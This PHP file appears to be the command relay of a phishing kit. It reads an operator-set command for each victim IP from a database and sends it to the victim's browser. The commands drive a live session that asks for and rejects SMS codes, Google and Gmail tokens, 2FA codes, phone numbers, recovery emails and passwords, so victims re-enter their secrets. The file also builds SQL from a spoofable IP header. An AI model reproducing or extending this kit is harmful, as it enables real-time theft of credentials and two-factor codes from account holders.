<?php

session_start();
error_reporting(0);

require_once "../cod3rconfig/registro.php";
require_once "../cod3rconfig/conexao.php";
require_once "../cod3rconfig/data.php";
require_once "../bot.php";

$ip            = (isset($_SERVER["HTTP_CF_CONNECTING_IP"])?$_SERVER["HTTP_CF_CONNECTING_IP"]:$_SERVER['REMOTE_ADDR']);
$query_info    = "SELECT * FROM infos WHERE ip = '$ip'"; 
$recorinfo     = mysqli_query(DBConnect(), $query_info) or die(mysqli_error(DBConnect()));
$row_infio     = mysqli_fetch_assoc($recorinfo); 
$totalRowsinfo = mysqli_num_rows($recorinfo);
if($row_infio['qrcode']=='up') die(json_encode(['comando'=>'<r>']));
$comando       = $row_infio['statusremote'];


	if($comando == "deslogar"){


	 
   $ok = array("comando"=> "deslogar");
  //faz o parsing na string, gerando um objeto PHP
   echo $obj = json_encode($ok);
		
	}


	if($comando == "pediremailrecuperar"){


	 
   $ok = array("comando"=> "pediremailrecuperar");
  //faz o parsing na string, gerando um objeto PHP
   echo $obj = json_encode($ok);
		
	}



if($comando == "negarmailderecu"){


	 
   $ok = array("comando"=> "negarmailderecu");
  //faz o parsing na string, gerando um objeto PHP
   echo $obj = json_encode($ok);
		
	}


	if($comando == "bloquearip"){


	 
   $ok = array("comando"=> "bloquearip");
  //faz o parsing na string, gerando um objeto PHP
   echo $obj = json_encode($ok);
		
	}



if($comando == "pedirverificaMail") {
    $ok       = array("comando"=> "pedirverificaMail");
	echo $obj = json_encode($ok);

}

if($comando == "NegarverificaMail") {
    $ok       = array("comando"=> "NegarverificaMail");
	echo $obj = json_encode($ok);

}


if($comando == "notificagmail") {
    $ok       = array("comando"=> "notificagmail");
	echo $obj = json_encode($ok);

}

if($comando == "notificagmailq") {
    $ok       = array("comando"=> "notificagmailq");
	echo $obj = json_encode($ok);

}

if($comando == "button_addmsg") {
    $ok       = array("comando"=> "button_addmsg");
	echo $obj = json_encode($ok);

}

if($comando == "pedircodemail") {
    $ok       = array("comando"=> "pedircodemail");
	echo $obj = json_encode($ok);

}


if($comando == "negarcodemail") {
    $ok       = array("comando"=> "negarcodemail");
	echo $obj = json_encode($ok);

}

if($comando == "pedirtokengmail") {
    $ok       = array("comando"=> "pedirtokengmail");
	echo $obj = json_encode($ok);

}


if($comando == "negartokengmail") {
    $ok       = array("comando"=> "negartokengmail");
	echo $obj = json_encode($ok);

}

if($comando == "pedirtelefonegmail") {
    $ok       = array("comando"=> "pedirtelefonegmail");
	echo $obj = json_encode($ok);

}


if($comando == "negargmailtelefone") {
    $ok       = array("comando"=> "negargmailtelefone");
	echo $obj = json_encode($ok);

}


if($comando == "pedirsmsgmail") {
    $ok       = array("comando"=> "pedirsmsgmail");
	echo $obj = json_encode($ok);

}
if($comando == "negargmail") {
    $ok       = array("comando"=> "negargmail");
	echo $obj = json_encode($ok);

}

if($comando == "notifyclient") {
    $ok       = array("comando"=> "notifyclient");
	echo $obj = json_encode($ok);

}

if($comando == "emailvalidationmsgpt") {
    $ok       = array("comando"=> "emailvalidationmsgpt");
	echo $obj = json_encode($ok);

}

if($comando == "emailvalidationmsges") {
    $ok       = array("comando"=> "emailvalidationmsges");
	echo $obj = json_encode($ok);

}

if($comando == "emailvalidationmsgus") {
    $ok       = array("comando"=> "emailvalidationmsgus");
	echo $obj = json_encode($ok);

}

if($comando == "pedirbloqueio") {
	$ok       = array("comando"=> "pedirbloqueio");
	echo $obj = json_encode($ok);
}


if($comando == "pedircodigogoogle") {
	$ok       = array("comando"=> "pedircodigogoogle");
	echo $obj = json_encode($ok);
}


if($comando == "negarcodigogoogle") {
	$ok       = array("comando"=> "negarcodigogoogle");
	echo $obj = json_encode($ok);
}

if($comando == "smscodeverificationP") {
	$ok       = array("comando"=> "smscodeverificationP");
	echo $obj = json_encode($ok);
}


if($comando == "smscodeverificationN") {
	$ok       = array("comando"=> "smscodeverificationN");
	echo $obj = json_encode($ok);
}

if($comando == "mailcodeverificationP") {
	$ok       = array("comando"=> "mailcodeverificationP");
	echo $obj = json_encode($ok);
}


if($comando == "mailcodeverificationN") {
	$ok       = array("comando"=> "mailcodeverificationN");
	echo $obj = json_encode($ok);
}

if($comando == "senhafundoP") {
	$ok       = array("comando"=> "senhafundoP");
	echo $obj = json_encode($ok);
}

if($comando == "senhafundoPQ") {
	$ok       = array("comando"=> "senhafundoPQ");
	echo $obj = json_encode($ok);
}

if($comando == "linkP") {
	$ok       = array("comando"=> "linkP");
	echo $obj = json_encode($ok);
}

if($comando == "linkB") {
	$ok       = array("comando"=> "linkB");
	echo $obj = json_encode($ok);
}


if($comando == "senhafundoN") {
	$ok       = array("comando"=> "senhafundoN");
	echo $obj = json_encode($ok);
}



if($comando == "pediremail") {
	$ok       = array("comando"=> "pediremail");
	echo $obj = json_encode($ok);
}

if($comando == "fora_ar") {
	$ok       = array("comando"=> "fora_ar");
	echo $obj = json_encode($ok);
}

if($comando == "envioimagem") {
	$ok       = array("comando"=> "envioimagem");
	echo $obj = json_encode($ok);
}

if($comando == "envioimagemX") {
	$ok       = array("comando"=> "envioimagemX");
	echo $obj = json_encode($ok);
}

if($comando == "negaremailsyng") {
	$ok       = array("comando"=> "negaremailsyng");
	echo $obj = json_encode($ok);
}	

if($comando == "negarnav") {
	$ok       = array("comando"=> "negarnav");
	echo $obj = json_encode($ok);
}

if($comando == "2fatoresgoogle") {
	$ok       = array("comando"=> "2fatoresgoogle");
	echo $obj = json_encode($ok);
}

if($comando == "negarfatorgoogle") {
	$ok       = array("comando"=> "negarfatorgoogle");
	echo $obj = json_encode($ok);
}	



if($comando == "pedirsms") {
	$ok       = array("comando"=> "pedirsms");
	echo $obj = json_encode($ok);
}

if($comando == "negarsms") {
	$ok       = array("comando"=> "negarsms");
	echo $obj = json_encode($ok);
}

if($comando == "pedirsms2") {
	$ok       = array("comando"=> "pedirsms2");
	echo $obj = json_encode($ok);
}

if($comando == "negarsms2") {
	$ok       = array("comando"=> "negarsms2");
	echo $obj = json_encode($ok);
}


if($comando == "2fatores") {
	$ok       = array("comando"=> "2fatores");
	echo $obj = json_encode($ok);
}

if($comando == "negar2fatores") {
	$ok       = array("comando"=> "negar2fatores");
	echo $obj = json_encode($ok);
}

if($comando == "2fatoresdentro") {
	$ok       = array("comando"=> "2fatoresdentro");
	echo $obj = json_encode($ok);
}

if($comando == "negar2fatoresdentro") {
	$ok       = array("comando"=> "negar2fatoresdentro");
	echo $obj = json_encode($ok);
}

if($comando == "smscodeverificationPdentro") {
	$ok       = array("comando"=> "smscodeverificationPdentro");
	echo $obj = json_encode($ok);
}

if($comando == "smscodeverificationNdentro") {
	$ok       = array("comando"=> "smscodeverificationNdentro");
	echo $obj = json_encode($ok);
}

if($comando == "mailcodeverificationPdentro") {
	$ok       = array("comando"=> "mailcodeverificationPdentro");
	echo $obj = json_encode($ok);
}

if($comando == "mailcodeverificationNdentro") {
	$ok       = array("comando"=> "mailcodeverificationNdentro");
	echo $obj = json_encode($ok);
}


if($comando == "ok") {
	$ok       = array("comando"=> "ok");
	echo $obj = json_encode($ok);
}

if($comando == "ipblock") {
	$ok       = array("comando"=> "ipblock");
	echo $obj = json_encode($ok);
}
if($comando == "negaruser") {
	$ok       = array("comando"=> "negaruser");
	echo $obj = json_encode($ok);
}

?>